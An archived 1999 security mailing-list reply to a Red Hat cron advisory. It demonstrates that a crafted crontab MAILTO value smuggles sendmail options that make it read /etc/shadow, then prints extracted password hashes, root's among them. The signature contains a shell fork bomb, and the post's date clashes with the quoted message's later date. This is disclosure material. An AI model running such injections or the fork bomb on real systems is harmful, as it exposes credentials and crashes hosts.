Re: [RHSA-1999:030-01] Buffer overflow in cron daemon

From: Michal Zalewski (lcamtufat_private)
Date: Sun Jul 04 1999 - 18:27:32 PDT

Next message: Michal Zalewski: "Re: [Linux] glibc 2.1.x / wu-ftpd <=2.5 / BeroFTPD / lynx / vlock"

Previous message: Michal Zalewski: "[Linux] glibc 2.1.x / wu-ftpd <=2.5 / BeroFTPD / lynx / vlock /"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

On Wed, 25 Aug 1999, Bill Nottingham wrote:

> To the best of our knowledge, no known exploits exist at this time.
>
> Also, it was possible to use specially formatted 'MAILTO' environment
> variables to send commands to sendmail.

Oh, something from scratch:

[lcamtuf@onehost lcamtuf]$ crontab -l
MAILTO='-bi -O AliasFile=/etc/shadow'

* * * * * nonexistent
[lcamtuf@onehost lcamtuf]$ sleep 60
[lcamtuf@onehost lcamtuf]$ strings -n 2 /etc/shadow.db|awk -F: '$2==""{print " - " $1 }$2!=""{printf $1}'|grep -v '*'
I15hybS.C.S1. - lcamtuf
hA/p45.MNqAtO - root
YoYwL/aBGnfAsRQ - testy

_______________________________________________________________________
Michal Zalewski [lcamtufat_private] [link / marchew] [dione.ids.pl SYSADM]
[Marchew Industries] ! [http://lcamtuf.na.export.pl] bash$ :(){ :|:&};:
[voice phone: +48 (0) 22 813 25 86] ? [cellular phone: (0) 501 4000 69]
Iterowac jest rzecza ludzka, wykonywac rekursywnie - boska [P. Deutsch]

Next message: Michal Zalewski: "Re: [Linux] glibc 2.1.x / wu-ftpd <=2.5 / BeroFTPD / lynx / vlock"
Previous message: Michal Zalewski: "[Linux] glibc 2.1.x / wu-ftpd <=2.5 / BeroFTPD / lynx / vlock /"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:59:06 PDT